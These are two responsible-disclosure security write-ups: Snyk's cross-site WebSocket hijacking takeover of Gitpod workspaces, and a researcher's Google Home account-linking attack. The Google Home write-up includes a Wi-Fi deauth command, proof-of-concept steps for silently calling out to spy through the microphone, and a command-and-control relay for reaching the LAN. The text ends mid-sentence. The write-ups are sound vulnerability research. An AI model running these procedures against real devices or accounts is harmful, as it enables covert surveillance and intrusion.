This article walks us through a current Snyk Security Labs research project focusing on cloud based development environments (CDEs) — which resulted in a full workspace takeover on the Gitpod platform and extended to the user’s SCM account. The issues here have been responsibly disclosed to Gitpod and were resolved within a single working day!
Cloud development environments and Gitpod
As more and more companies begin to leverage cloud-based development environments for benefits such as improved performance, developer experience, consistent development environments, and low setup times, we couldn’t help but wonder about the security implications of adopting these cloud based IDEs.
First, let’s provide a brief overview of how CDEs operate so we can understand the difference between cloud-based and traditional, local-workstation based development — and how it changes the developer security landscape.
In contrast to traditional development, CDEs run on a cloud hosted machine with an IDE backend. This typically provides a web application version of the IDE and support for integrating with a locally installed IDE over SSH, giving users a seamless and familiar experience. When using a CDE, the organization’s code and any supporting services, such as a development database, are hosted within the cloud. Check out the following diagram for a visual representation of information flow in a CDE.
The security risks of locally installed development environments are not new. However, they historically haven’t received much attention from developers. In May 2021, Snyk disclosed vulnerable VS Code extensions that lead to a 1-click data leak or arbitrary command execution. These traditional workstation-based development environments, such as a local instance of VS Code or IntelliJ, carry other information security concerns — including hardware failure, data security, and malware. While these concerns can be addressed by employing Full Disk Encryption, version control, backups, and anti-malware systems, many questions remain unanswered with the adoption of cloud-based development environments:
What happens if a cloud IDE workspace is infected with malware?
What happens when access controls are insufficient and allow cross-user or even cross-organization access to workspaces?
What happens when a rogue developer exfiltrates company intellectual property from a cloud-hosted machine outside the visibility of the organization’s data loss prevention or endpoint security software?
In a current security research project here at Snyk, we examine the security implications of adopting cloud based IDEs. In this article we present a case study of one of the vulnerabilities discovered during our initial exploration in the Gitpod platform.
Examining the Gitpod platform
Disclaimer: When it came to looking at cloud IDE solutions for our research, we settled on either self-hosted or cloud-based solutions, where the vendor has a clearly defined security policy providing safe harbor for researchers.
One of the most popular CDE’s is Gitpod. Its wide adoption and extended feature set — including automated backups, Git integration out of the box, and multiple IDE backends — ensured that Gitpod was among the first products we looked into.
The first stage of our research involved becoming familiar with the basic workflows of Gitpod, setting up an organization, and experimenting with the product while capturing traffic using Burpsuite to observe the various APIs and transactions. We then pulled the Gitpod source code from GitHub to study the inner workings of its APIs, and reviewed any relevant architecture documentation to better understand each of the components and their function. A great resource for this was a video that provided an initial deep dive into the architecture of Gitpod. At a high level, Gitpod leverages multiple microservices deployed in a Kubernetes environment, where each user workspace is deployed to a dedicated ephemeral pod.
Gitpod’s primary set of external components are concerned with the dashboard, authentication, and the creation and management of workspaces, organizations, and accounts. At its core, the main component here is aptly named server, a TypeScript application that exposes a JSONRPC API over WebSocket that is consumed by a React frontend called dashboard.
From the dashboard, it’s easy to integrate with a SCM provider, such as GitHub or Bitbucket, to import a repository and spin up a development environment — which then serves the source code and provides a working Git environment. Once the workspace is provisioned, it is made accessible via
SSH
and
HTTPS
on a subdomain of gitpod.io (i.e
https://[WORKSPACE_NAME].[CLUSTER_NAME].gitpod.io
) through a Golang-based component called ws-proxy.
The security vulnerability that was discovered through our research relates primarily to the server component and the JSONRPC served over a WebSocket connection, which ultimately led to a workspace takeover in Gitpod.
Technical details
WebSockets and Same Origin Policy
WebSocket is a technology that allows for real-time, two-way communication between a client (typically a web browser) and a server. It enables a persistent connection between the client and server, allowing for continuous “real-time” data transfer without the need for repeated HTTP requests.
An interesting aspect of WebSockets from a security perspective, is that a browser security mechanism, the Same Origin Policy (SOP), does not apply. This is the security control which prevents a website from issuing an AJAX request to another website and being able to read the response. If this were possible, it would present a security concern because browsers typically submit cookies along with every request (even for Cross Origin requests, such as CSRF related attacks). Without SOP, any website would be able to issue requests to foreign websites and obtain your data from other domains.
This leads us to the vulnerability class known as Cross-Site WebSocket Hijacking. This attack is similar to a combination of a Cross-Site Request Forgery and CORS misconfiguration. When a WebSocket handshake relies solely upon HTTP cookies for authentication, a malicious website is able to instantiate a new WebSocket connection to the vulnerable application, allowing an attacker to both send and receive data through the connection.
When reviewing an application with WebSocket connections, it’s always worth examining this in depth. Let’s take a look at the WebSocket request for the Gitpod server.
In normal circumstances, the connection is successfully upgraded to a WebSocket and communication begins. There was no additional authentication taking place within the WebSocket exchange itself, and the JSONRPC can be invoked via the WebSocket connection.
So far, we’ve found no additional authentication taking place within the established channel — a good sign for any potential attackers. Now, let’s verify that no additional Origin checks are taking place by taking a handshake we have observed and tampering with the Origin header.
This looks promising! It seems that the domain
evil.com
is able to issue Cross-Origin WebSocket requests to
gitpod.io
. However, another security mechanism introduces a challenge.
SameSite Cookie bypass
SameSite cookies are a fairly recent addition, providing partial mitigation against Cross-Site Request Forgery (CSRF) attacks. While not everyone has adopted them, most popular browsers have made the default value for all cookies which do not explicitly disable
SameSite
to be
Lax
. So while the underlying vulnerability is present, without a bypass for
SameSite
cookies our attack would largely be theoretical and only work against a subset of outdated and niche browsers.
So what is a
site
in the context of
SameSite
? Simply put, the site corresponds to the combination of the scheme and the registrable domain (if any) of the origin’s host. If we look at the specifications for
SameSite
we can see that subdomains are not considered. This is more relaxed than the specification of an Origin used by the Same Origin Policy, which is comprised of a scheme + host (including subdomains) + port (eg: https://security.snyk.io:8443).
Earlier, we observed that the workspace was exposed via a subdomain on
gitpod.io
. In the context of
SameSite
, the workspace URL is considered to be the same site as
gitpod.io
. So, it should be possible for one workspace to issue a cross-domain
SameSite
request to a
*.gitpod.io
domain with the original user’s cookies attached. Let’s see if we can leverage an attacker controlled workspace to serve a WebSocket Hijacking payload.
To first verify that the cookies are indeed transmitted and the WebSocket communication is successfully achieved, let’s open the browser console from a workspace and attempt to initiate a WebSocket connection.
As we can see in the above screenshot, we attempt to open a new WebSocket connection and, once open, submit a JSONRPC request. We can see in the console output that a message has been received containing the result of our request, confirming that the cookies are submitted and the origin is permitted to open a websocket to
gitpod.io
.
We now need a way to serve JavaScript from the workspace that can be accessed by a Gitpod user. When looking through the features available, it is possible to expose ports in the workspace and make them accessible using a command line utility called
gitpod-cli
— available on the path inside the workspace by typing
gp
. We can invoke
gp ports expose 8080
, and then set up a basic Python web server using
python -m http.server 8080
. This in turn creates a new subdomain where the exposed port can be accessed as shown below.
However, the connection failed. This is somewhat concerning and requires more investigation. Here we open the source code and start looking for what could be causing the problem. We found the following regular expression pattern, which appears to be used to extract the workspace name from the URL.
The way this matching is performed results in the wrong workspace name being extracted, as demonstrated in the following screenshot:
So, it looks like we can’t serve our content from an exposed port inside the Gitpod hosted workspace and we need another way. By now we already know that we have privileged access to a machine that’s running the VS Code service and is serving requests issued to our workspace URL — so can we abuse this in some way?
The initial idea was to terminate the
vscode
process and start a Python web server to serve an HTML file. Unfortunately, this did not work and resulted in the workspace being restarted. This appeared to be performed by a local service
supervisor
. While testing this approach we noticed that when we terminated the process without binding another process to the VS Code port, the
supervisor
service will automatically restart the
vscode
process, resulting in a brief hang to the UI without a full restart of the workspace.
This brought a promising idea. Can we patch VS Code to serve a built-in exploit for us?
Patching VS Code was relatively easy. By comparing the original VS Code server source code to the distributed version, we quickly found a convenient location to serve the exploit.
VS Code contains an API endpoint at
/version
, which returns the commit of the current version:
We modified it so that the correct
Content-Type
of
text/html
and the contents of an HTML file were returned. Now, we terminated the
vscode
process, allowing our newly introduced changes to load into a newly spawned VS Code process instance:
Finally, we can leverage the JSONRPC methods
getLoggedInUser
,
getGitpodTokens
,
getOwnerToken
, and
addSSHPublicKey
to build a payload that grants us full control over the user’s workspaces when an unsuspecting Gitpod user visits our link!
Here it is in action:
We can see that we’ve been able to extract some sensitive information about the user account, and are notified that our SSH key has been added to the account. Let’s see if we can SSH to the workspace:
Mission successful! As shown above, we have full access to the user’s workspaces after they’ve visited a link we sent them!
Timeline
Mon, Feb. 13, 2023 — Vulnerability disclosed to vendor
In this post, we presented the first findings from our current research into Cloud Development Environments (CDEs) — which allowed a full account takeover through visiting a link, exploiting a commonly misunderstood vulnerability (WebSocket Hijacking), and leveraging a practical SameSite cookie bypass. As cloud developer workspaces are becoming increasingly popular, it’s important to consider the additional risks that are introduced.
We would like to praise Gitpod for their fantastic turnaround on addressing this security vulnerability, and look forward to presenting more of our findings on cloud-based remote development solutions in the near future.
I was recently rewarded a total of $107,500 by Google for responsibly disclosing security issues in the Google Home smart speaker that allowed an attacker within wireless proximity to install a “backdoor” account on the device, enabling them to send commands to it remotely over the Internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN (which could potentially expose the Wi-Fi password or provide the attacker direct access to the victim’s other devices). These issues have since been fixed.
(Note: I tested everything on a Google Home Mini, but I assume that these attacks worked similarly on Google’s other smart speaker models.)
Investigation
I was messing with the Google Home and noticed how easy it was to add new users to the device from the Google Home app. I also noticed that linking your account to the device gives you a surprising amount of control over it.
Namely, the “routines” feature allows you to create shortcuts for running a series of other commands (e.g. a “good morning” routine that runs the commands “turn off the lights” and “tell me about the weather”). Through the Google Home app, routines can be configured to start automatically on your device on certain days at certain times. Effectively, routines allow anyone with an account linked to the device to send it commands remotely. In addition to remote control over the device, a linked account also allows you to install “actions” (tiny applications) onto it.
When I realized how much access a linked account gives you, I decided to investigate the linking process and determine how easy it would be to link an account from an attacker’s perspective.
So… how would one go about doing that? There are a bunch of different routes to explore when reverse engineering an IoT device, including (but not limited to):
Obtaining the device’s firmware by dumping it or downloading it from the vendor’s website
Static analysis of the app that interfaces with the device (in this case, the “Google Home” Android app), e.g. using Apktool or JADX to decompile it
Dynamic analysis of the app during runtime, e.g. using Frida to hook Java methods and print info about internal state
Intercepting the communications between the app and the device (or between the app/device and the vendor’s servers) using a “man-in-the-middle” (MITM) attack
Obtaining firmware is particularly difficult in the case of Google Home because there are no debugging/flashing pins on the device’s PCB so the only way to read the flash is to desolder the NAND chip. Google also does not publicly provide firmware image downloads. As shown at DEFCON though, it is possible.
However, in general, when reverse engineering things, I like to start with a MITM attack if possible, since it’s usually the most straightforward path to gaining some insight into how the thing works. Typically IoT devices use standard protocols like HTTP or Bluetooth for communicating with their corresponding apps. HTTP in particular can be easily snooped using tools like mitmproxy. I love mitmproxy because it’s FOSS, has a nice terminal-based UI, and provides an easy-to-use Python API.
Since the Google Home doesn’t have its own display or user interface, most of its settings are controlled through the Google Home app. A little Googling revealed that some people had already begun to document the local HTTP API that the device exposes for the Google Home app to use. Google Cast devices (including Google Homes and Chromecasts) advertise themselves on the LAN using mDNS, so we can use
dns-sd
to discover them:
$ dns-sd -B _googlecast._tcp
Browsing for _googlecast._tcp
DATE: ---Fri 05 Aug 2022---
15:30:15.526 ...STARTING...
Timestamp A/R Flags if Domain Service Type Instance Name
15:30:15.527 Add 3 6 local. _googlecast._tcp. Chromecast-997113e3cc9fce38d8284cee20de6435
15:30:15.527 Add 3 6 local. _googlecast._tcp. Google-Nest-Hub-d5d194c9b7a0255571045cbf615f7ffb
15:30:15.527 Add 3 6 local. _googlecast._tcp. Google-Home-Mini-f09088353752a2e56bddbb2a27ec377
We can use
nmap
to find the port that the local HTTP API is running on:
$ nmap 192.168.86.29
Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-05 15:41
Nmap scan report for google-home-mini.lan (192.168.86.29)
Host is up (0.0075s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
8008/tcp open http
8009/tcp open ajp13
8443/tcp open https-alt
9000/tcp open cslistener
10001/tcp open scp-config
We see HTTP servers on port 8008 and 8443. According to the unofficial documentation I linked above, 8008 is deprecated and only 8443 works now. (The other ports are for Chromecast functionality, and some unofficial documentation for those is available elsewhere on the Internet.) Let’s try issuing a request:
Indeed, it’s rejecting the request because we’re not authorized. So how do we get the token? Well, the docs say that you can either extract it from the Google Home app’s private app data directory (if your phone is rooted), or you can use a script that takes your Google username and password as input, calls the API that the Google Home app internally uses to get the token, and returns the token. Both of these methods require that you have an account that’s already been linked to the device, though, and I wanted to figure out how the linking happens in the first place. Presumably, this token is being used to prevent an attacker (or malicious app) on the LAN from accessing the device. Therefore, it surely takes more than just basic LAN access to link an account and get the token, right…? I searched the docs but there was no mention of account linking. So I proceeded to investigate the matter myself.
Setting up the proxy
Intercepting unencrypted HTTP traffic with mitmproxy on Android is as simple as starting the proxy server then configuring your phone (or just the target app) to route all of its traffic through the proxy. However, the unofficial local API documentation said that Google had recently started using HTTPS. Also, I wanted to be able to intercept not only the traffic between the app and the Google Home device, but also between the app and Google’s servers (which is definitely HTTPS). I thought that since the linking process involved Google accounts, parts of the process might happen on the Google server, rather than on the device.
Intercepting HTTPS traffic on Android is a little trickier, but usually not terribly difficult. In addition to configuring the proxy settings, you also need to make the app trust mitmproxy’s root CA certificate. You can install new CAs through Android Settings, but annoyingly as of Android 7 apps using the system-provided networking APIs will no longer automatically trust user-added CAs. If you have a rooted Android phone, you can modify the system CA store directly (located at
/system/etc/security/cacerts
). Alternatively, you could manually patch the individual app. However, sometimes even that isn’t enough as some apps employ “SSL pinning” to ensure that the certificate used for SSL matches the one they were expecting. If the app uses the system-provided pinning APIs (
javax.net.ssl
) or uses a popular HTTP library (e.g. OkHttp), it’s not hard to bypass; just hook the relevant methods with Frida or Xposed. While Xposed and the full version of Frida both require root, Frida Gadget can be used without root. If the app is using a custom pinning mechanism, you’ll have to reverse engineer it and manually patch it out.
Patching and repacking the Google Home app isn’t an option because it uses Google Play Services OAuth APIs (which means the APK needs to be signed by Google or it’ll crash), so root access is necessary to intercept its traffic. Since I didn’t want to root my primary phone, and emulators tend to be clunky, I decided to use an old spare phone I had lying around. I rooted it using Magisk and modified the system CA store to include mitmproxy’s CA, but this wasn’t sufficient as the Google Home app appeared to be utilizing SSL pinning. To bypass the pinning, I used a Frida script I found on GitHub.
I could now see all of the encrypted traffic showing up in mitmproxy:
Even the traffic between the app and device was being captured. Cool!
Observing the link process
Alright, so let’s observe what happens when a new user links their account to the device. I already had my primary Google account linked, so I created a new account as the “attacker”. When I opened the Google Home app and signed in under the new account (making sure I was connected to the same Wi-Fi network as the device), the device showed up under “Other devices”, and when I tapped on it, I was greeted with this screen:
I pressed the button and it prompted me to install the Google Search app to continue. I guess the Voice Match setup is done through that app instead. But as an attacker I don’t care about adding my voice to the device; I only want to link my account. So is it possible to link an account without Voice Match? I thought that it must be, since the initial device setup was done entirely within the Home app, and I wasn’t required to enable Voice Match on my primary account. I was about to perform a factory reset and observe the initial account link, but then I realized something.
Much of the internal architecture of Google Home is shared with Chromecast devices. According to a DEFCON talk, Google Home devices use the same operating system as Chromecasts (a version of Linux). The local API seems to be the similar, too. In fact, the Home app’s package name ends with
chromecast.app
, and it used to just be called “Chromecast”. Back then, its only function was to set up Chromecast devices. Now it’s responsible for setting up and managing not just Chromecasts, but all of Google’s smart home devices.
Anyway, why not just try observing how the Chromecast link process works, then try to replicate it for use with the Google Home? It’s bound to be simpler, because Chromecasts don’t support Voice Match (nor the Google Assistant, for that matter). Luckily, I also had a few Chromecasts lying around. I plugged in one and found it within the Home app:
All I had to do was tap the “Enable voice control and more” banner and confirm, and then my account was linked! Ok, let’s see what happened on the network side:
We see a POST request to a
/deviceuserlinksbatch
endpoint on
clients3.google.com
:
It’s a binary payload, but we can immediately see that it contains some device details (e.g. the device’s name, “Office TV”). We see that the
content-type
is
application/protobuf
. Protocol Buffers is Google’s binary data serialization format. Like JSON, data is stored in pairs of keys and values. The client and server exchanging protobuf data both have a copy of the
.proto
file, which defines the field names and data types (e.g.
uint32
,
bool
,
string
, etc). During the encoding process, this data is stripped out, and all that remains are the field numbers and wire types. Fortunately, the wire types translate pretty directly back to the original data types (there are usually only a few possibilities as to what the original data type could have been based on the wire type). Google provides a command-line tool called
that allows us to encode and decode protobuf data. The
--decode_raw
option tells
protoc
to decode without the
.proto
file by guessing what the data types are. This raw decoding is usually enough to understand the data structure, but if it doesn’t look right, you could create your own
.proto
with your data type guesses, try to decode, and if it still doesn’t make sense, keep adjusting the
Looks like the link request payload mainly consists of three things: device name, certificate, and “cloud ID”. I quickly recognized these values from the earlier
/setup/eureka_info
local API requests. So it appears that the link process is:
Get the device’s info through its local API
Send a link request to the Google server along with this info
I wanted to use mitmproxy to re-issue a modified version of the request, replacing my Chromecast’s info with the Google Home’s info. I would eventually want to create a
.proto
file so I could use
protoc --encode
to create link requests from scratch, but at that point I just wanted to quickly test to see if it would work. I figured I could replace any strings in the binary payload without causing any problems as long as they were the same length. The cloud ID and cert were the same lengths, but the name (“Office speaker”) was not, so I renamed the device in the Home app to make it that way. Then I issued the modified request, and it appeared to work. The Google Home’s settings were unlocked in the Home app. Behind the scenes, I saw in mitmproxy that the device’s local auth token was being sent along with local API requests.
Python re-implementation
The next thing I wanted to do is re-implement the link process with a Python script so I didn’t have to bother with the Home app any more.
To get the required device info, we just need to issue a request like:
GET https://[Google Home IP]:8443/setup/eureka_info?params=name,device_info,sign
Re-implementing the actual link request was a tad harder. First I examined the script mentioned by the unofficial local API docs that calls Google’s cloud APIs. It uses a library called gpsoauth which implements Android’s Google login flow in Python. Basically, it turns your Google username and password into OAuth tokens, which can be used to call undocumented Google APIs. It’s being used by some unofficial Python clients for Google services, like gkeepapi for Google Keep.
I used mitmproxy and gpsoauth to figure out and re-implement the link request. It looks like this:
POST https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b
Authorization: Bearer [token from gpsoauth]
[...some uninteresting headers added by the Home app...]
Content-Type: application/protobuf
[device info protobuf payload, described earlier]
To create the protobuf payload, I made a simple
.proto
file for the link request so I could use
protoc --encode
. I gave the fields I knew descriptive names (e.g.
to encode a message with the same values as the message I captured from the Home app, and made sure that the binary output was the same.
Putting it all together, I had a Python script that takes your Google credentials and an IP address as input and uses them to link your account to the Google Home device at the provided IP.
Further investigation
Now that I had my Python script, it was time to think from the perspective of an attacker. Just how much control over the device does a linked account gives you, and what are some potential attack scenarios? I first targeted the routines feature, which allows you to execute voice commands on the device remotely. Doing some more research into previous attacks on Google Home devices, I encountered the “Light Commands” attack, which provided some inspiration for coming up with commands that an attacker might use:
Control smart home switches
Open smart garage doors
Make online purchases
Remotely unlock and start certain vehicles
Open smart locks by stealthily brute forcing the user’s PIN number
I wanted to go further though and come up with an attack that would work on all Google Home devices, regardless of how many other smart devices that the user has. I was trying to come up with a way to use a voice command to activate the microphone and exfiltrate the data. Perhaps I could use voice commands to load an application onto the device which opens the microphone? Looking at the “conversational actions” docs, it seemed possible to create an app for the Google Home and then invoke it on a linked device using the command “talk to my test app”. But these “apps” can’t really do much. They don’t have access to the raw audio from the microphone; they only get a transcription of what the user says. They don’t even run on the device itself. Rather, the Google servers talk to your app via webhooks on the device’s behalf. The “smart home actions” seemed more interesting, but that’s something I explored later.
All of a sudden it hit me: these devices support a “call [phone number]” command. You could effectively use this command to tell the device to start sending data from its microphone feed to some arbitrary phone number.
Creating malicious routines
The interface for creating a routine within the Google Home app looks like this:
With the help of mitmproxy, I learned that this is actually just a WebView that embeds the website
https://assistant.google.com/settings/routines
, which loads fine in a normal web browser (as long as you’re logged in to a Google account). This made reverse engineering it a little easier.
I created a routine to execute the command “call [my phone number]” on Wednesdays at 8:26 PM (it was currently a Wednesday, at 8:25 PM). For routines that run automatically at certain times, you need to specify a “device for audio” (a device to run the routine on). You can choose from a list of devices linked to your account:
A minute later, the routine executed on my Google Home, and it called my phone. I picked up the phone and listened to myself talking through the Google Home’s microphone. Pretty cool!
(Later through inspecting network requests, I found that you can specify not only the hour and minute to activate the routine at, but also the precise second, which meant I only had to wait a few seconds for my routines to activate, rather than about a minute.)
An attack scenario
I had a feeling that Google didn’t intend to make it so easy to access the microphone feed on the Google Home remotely. I quickly thought of an attack scenario:
Attacker wishes to spy on victim.
Victim installs attacker’s malicious Android app.
App detects a Google Home on the network via mDNS.
App uses the basic LAN access it’s automatically granted to silently issue the two HTTP requests necessary to link the attacker’s account to the victim’s device (no special permissions necessary).
Attacker can now spy on the victim through their Google Home.
This still requires social engineering and user interaction, though, which isn’t ideal from an attacker’s perspective. Can we make it cooler?
From a more abstract point of view, the combined device information (name, cert, and cloud ID) basically acts as a “password” that grants remote control of the device. The device exposes this password over the LAN through the local API. Are there other ways for an attacker to access the local API?
In 2019, “CastHack” made the news, as it was discovered that thousands of Google Cast devices (including Google Homes) were exposed to the public Internet. At first it was believed that the issue was these devices’ use of UPnP to automatically open ports on the router related to casting (8008, 8009, and 8443). However, it appears that UPnP is only used by Cast devices for local discovery, not for port forwarding, so the likely cause was a widespread networking misconfiguration (that might be related to UPnP somehow).
The people behind CastHack didn’t realize the true level of access that the local API provides (if combined with cloud APIs):
What can hackers do with this?
Remotely play media on your device, rename your device, factory reset or reboot the device, force it to forget all wifi networks, force it to pair to a new bluetooth speaker/wifi point, and so on.
(These are all local API endpoints, documented by the community already. This was also before the local API started requiring an auth token.)
What CAN’T hackers do with this?
Assuming the Chromecast/Google Home is the only problem you have, hackers CANNOT access other devices on the network or sniff information besides WIFI points and Bluetooth devices. They also don’t have access to your personal Google account, nor the Google Home’s microphone.
There are services like Shodan that allow you to scan the Internet for open ports and vulnerable devices. I was able to find hundreds of Cast devices with port 8443 (local API) publicly exposed using some simple search queries. I didn’t pursue this for very long though, because ultimately bad router configuration is not something Google can fix.
While I was reading about CastHack, however, I encountered articles all the way back from 2014 (!) about the “RickMote”, a PoC contraption developed by Dan Petro, security researcher at Bishop Fox, that hijacks nearby Chromecasts and plays “Never Gonna Give You Up” on YouTube. Petro discovered that, when a Chromecast loses its Internet connection, it enters a “setup mode” and creates its own open Wi-Fi network. The intended purpose is to allow the device’s owner to connect to this network from the Google Home app and reset the Wi-Fi settings (in the event that the password was changed, for example). The “RickMote” takes advantage of this behavior.
It turns out that it’s usually really easy to force nearby devices to disconnect from their Wi-Fi network: just send a bunch of “deauth” packets to the target device. WPA2 provides strong encryption for data frames (as long as you choose a good password). However, “management” frames, like deauthentication frames (which tell clients to disconnect) are not encrypted. 802.11w and WPA3 support encrypted management frames, but the Google Home Mini doesn’t support either of these. (Even if it did, the router would need to support them as well for it to work, and this is rare among consumer home routers at this time due to potential compatibility issues. And finally, even if both the device and router supported them, there are still other methods for an attacker to disrupt your Wi-Fi. Basic channel jamming is always an option, though this requires specialized, illegal hardware. Ultimately, Wi-Fi is a poor choice for devices that must be connected to the Internet at all times.)
I wanted to check if this “setup mode” behavior was still in use on the Google Home. I installed
aircrack-ng
and used the following command to launch a deauth attack:
aireplay-ng --deauth 0 -a [router BSSID] -c [device MAC address] [interface]
My Google Home immediately disconnected from the network and then made its own:
I connected to the network and used
netstat
to get the router’s IP (the router being the Google Home), and saw that it assigned itself the IP
192.168.255.249
. I issued a local API request to see if it would work:
I was shocked to see that it did! With this information, it’s possible to link an account to the device and remotely control it.
A cooler attack scenario
Attacker wishes to spy on victim. Attacker can get within wireless proximity of the Google Home (but does NOT have the victim’s Wi-Fi password).
Attacker discovers victim’s Google Home by listening for MAC addresses with prefixes associated with Google Inc. (e.g.
E4:F0:42
).
Attacker sends deauth packets to disconnect the device from its network and make it enter setup mode.
Attacker connects to the device’s setup network and requests its device info.
Attacker connects to the Internet and uses the obtained device info to link their account to the victim’s device.
Attacker can now spy on the victim through their Google Home over the Internet (no need to be within proximity of the device anymore).
What else can we do?
Clearly a linked account gives a tremendous amount of control over the device. I wanted to see if there was anything else an attacker could do. We were now accounting for attackers that aren’t already on the victim’s network. Would it be possible to interact with (and potentially attack) the victim’s other devices through the compromised Google Home? We already know that with a linked account you can:
Get the local auth token and change device settings through the local API
Execute commands on the device remotely through “routines”
Install “actions”, which are like sandboxed applications
Earlier I looked into “conversational actions” and determined that these are too sandboxed to be useful as an attacker. But there is another type of action: “smart home actions”. Device manufacturers (e.g. Philips) can use these to add support for their devices to the Google Home platform (e.g. when the user says “turn on the lights”, their Philips Hue light bulbs will receive a “turn on” command).
One thing I found particularly interesting while reading the documentation was the “Local Home SDK”. Smart home actions used to only run through the Internet (like conversational actions), but Google had recently (April 2020) introduced support for running these locally, improving latency.
The SDK lets you write a local fulfillment app, using TypeScript or JavaScript, that contains your smart home business logic. Google Home or Google Nest devices can load and run your app on-device. Your app communicates directly with your existing smart devices over Wi-Fi on a local area network (LAN) to fulfill user commands, over existing protocols.
Sounded promising. I looked into how it works though and it turns out that these local home apps don’t have direct LAN access. You can’t just connect to any IP you want; rather, you need to specify a “scan configuration” using mDNS, UPnP or UDP broadcast. The Google Home scans the network on your behalf, and if any matching devices are found, it will return a JavaScript object that allows your app to interact with the device over TCP/UDP/HTTP.
Is there any way around this? I noticed that the docs said something about debugging using Chrome DevTools. It turns out that when a local home app is running in testing mode (deployed to the developer’s own account), the Google Home opens port 9222 for the Chrome DevTools Protocol (CDP). CDP access provides complete control over the Chrome instance. For example, you can open or close tabs, and intercept network requests. That got me thinking, maybe I could provide a scan configuration that instructs the Google Home to scan for itself, so I would be able to connect to CDP, take control of the Chrome instance running on the device, and use it to make arbitrary requests within the LAN.
I created a local home app using my linked account and set up the scan config to search for the
_googlecast._tcp.local
mDNS service. I rebooted the device, and the app loaded automatically. It quickly found itself and I was able to issue HTTP requests to
localhost
!
CDP uses WebSockets, which can be accessed through the standard JS API. The same-origin policy doesn’t apply to WebSockets, so we can easily initiate a WebSocket to
localhost
from our local home app (hosted on some public website) without any problems, as long as we have the correct URL. Because CDP access could lead to trivial RCE on the desktop version of Chrome, the WebSocket address is randomly generated each time debugging is enabled, to prevent random websites from connecting. The address can be retrieved through a GET request to
http://[CDP host]:9222/json
. This is normally protected by the same-origin policy, so we can’t just use an XHR request, but since we have full access to
localhost
through the Local Home SDK, we can use that to make the request. Once we have the address, we can use the JS
WebSocket()
constructor to connect.
Through CDP, we can send arbitrary HTTP requests within the victim’s LAN, which opens up the victim’s other devices for attack. As I describe later, I also found a way to read and write arbitrary files on the device using CDP.
Since the security issues have been fixed, none of these probably work anymore, but I thought they were worth documenting/preserving.
PoC #1: Spy on victim
I made a PoC that works on my Android phone (via Python on Termux) to demonstrate how quick and easy the process of linking an account could be. The attack described here could be performed within the span of a few minutes.
For the PoC, I re-implemented the device link and routines APIs in Python, and made the following utilities:
Raw packet injection (required for deauth attacks) requires a rooted phone and won’t work on some Wi-Fi chips. I ended up using a NodeMCU, a tiny Wi-Fi development board, going for less than $5 on Amazon, and flashed it with spacehuhn’s deauther firmware. You can use its web UI to scan for nearby devices and deauth them. It quickly found my Google Home (manufacturer listed as “Google” based on MAC address prefix) and I was able to deauth it.
In addition to linking your account, to make the attack as stealthy as possible, “night mode” is also enabled on the device, which decreases the maximum volume and LED brightness. Since music volume is unaffected, and the volume decrease is almost entirely suppressed when the volume is greater than 50%, this subtle change is unlikely to be noticed by the victim. However, it makes it so that, at 0% volume, the Assistant voice is completely muted (whereas with night mode off, it can barely still be heard at 0%).
Stop the deauth attack and wait for the device to re-connect to the Internet
You can run
python3 reset_volume.py 4
to reset the volume to 40% (since enabling night mode set it to 0%).
Now that your account is linked, you can make the device call your phone number, silently, at any time, over the Internet, allowing you to listen in to the microphone feed.
To issue a call, run
python3 call_device.py [phone number]
.
The commands “set the volume to 0” and “call [number]” are executed on the device remotely using a routine.
The only thing the victim may notice is that the device’s LEDs turn solid blue, but they’d probably just assume it’s updating the firmware or something. In fact, the official support page describing what the LED colors meanonly says solid blue means “Your speaker needs to be verified by you” and makes no mention of calling. During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.
Here’s a video demonstrating what it looks like when a call is initiated remotely:
As you can see, there is no audible indication that the commands are running, which makes it difficult for the victim to notice. The victim can still use their device normally for the most part (although certain commands, like music playback, don’t work during a call).
PoC #2: Make arbitrary HTTP requests on victim’s network
As I described earlier, the attacker can install a smart home action onto the linked device remotely, and leverage the Local Home SDK to make arbitrary HTTP requests within the victim’s LAN.
Under the default configuration, a proxy server starts on
localhost:8000
, and a WebSocket server starts on
0.0.0.0:9000
. The proxy server acts as a relay, sending requests from programs on your computer (like
curl
) to the victim’s Google Home through the WebSocket. In a real attack, the WebSocket port would need to be exposed to the Internet so the victim’s Google Home could connect to it, but for local demonstration, it doesn’t have to be.
Configure the local home app:
Change the
C2_WS_URL
variable at the top of
app.js
to the WebSocket URL for your C&C server. This needs to be reachable by the Google Home.
Host the static
index.html
and
app.js
files somewhere reachable by the Google Home. For local demonstration, you can spin up a simple file hosting server using
npm run firebase --prefix functions/ -- functions:config:set \
strand1.leds=16 strand1.channel=1 \
strand1.control_protocol=HTTP
npm run deploy --prefix functions/
This tells the cloud fulfillment to include an
otherDeviceIds
field in responses to
SYNC
requests. As far as I understand, this is all that’s required to activate local fulfillment; the specific device IDs or attributes you choose don’t matter.
Get within wireless proximity of the victim’s Google Home, then force it into setup mode, and link your account using the
link_device.py
script from PoC #1.
Reboot the device:
While still connected to the device’s setup network, send a POST request to the
/reboot
endpoint with the body
{"params":"now"}
and a
cast-local-authorization-token
header (obtained with
HomeGraphAPI.get_local_auth_tokens()
from
googleapi.py
).
For local demonstration, you can just unplug the Google Home then plug it back in.
Not long after the reboot, the Google Home automatically downloads your local home app and runs it.
The app waits for the
IDENTIFY
request it receives when the Google Home finds itself through mDNS scanning, then connects to the Chrome DevTools Protocol WebSocket on port 9222. After connecting to CDP, it opens a WebSocket to your C&C server, and waits for commands. If disconnected from either CDP or the C&C server, it automatically tries to reconnect every 5 seconds.
Once loaded, it seems to run indefinitely. The documentation says apps may be killed if they consume too much memory, but I haven’t run into this, and I’ve even left my app running overnight. If the Google Home is rebooted, the app will reload.
Now, you can send HTTP(S) requests on the victim’s private LAN, as if you had the WiFi password, even though you don’t (yet), by configuring a program on your computer to route its traffic through the local proxy server, which in turn routes it to the Google Home. For example,
Obviously, the ability to send requests on the private LAN opens a large attack surface. Using the IP of the Google Home, you can determine the subnet that the victim’s other devices are on. For example, my Google Home’s IP is
192.168.86.132
, so I could guess that my other devices are in the
192.168.86.0
to
192.168.86.255
range. You could write a simple script to
curl
every possible address, looking for devices on the LAN to attack or steal data from. Since it only takes a few seconds to check each IP, it would only take around 10 minutes to try every one. On my LAN, I found my printer’s web interface at
http://192.168.86.33
. Its network settings page contains an
<input type="password">
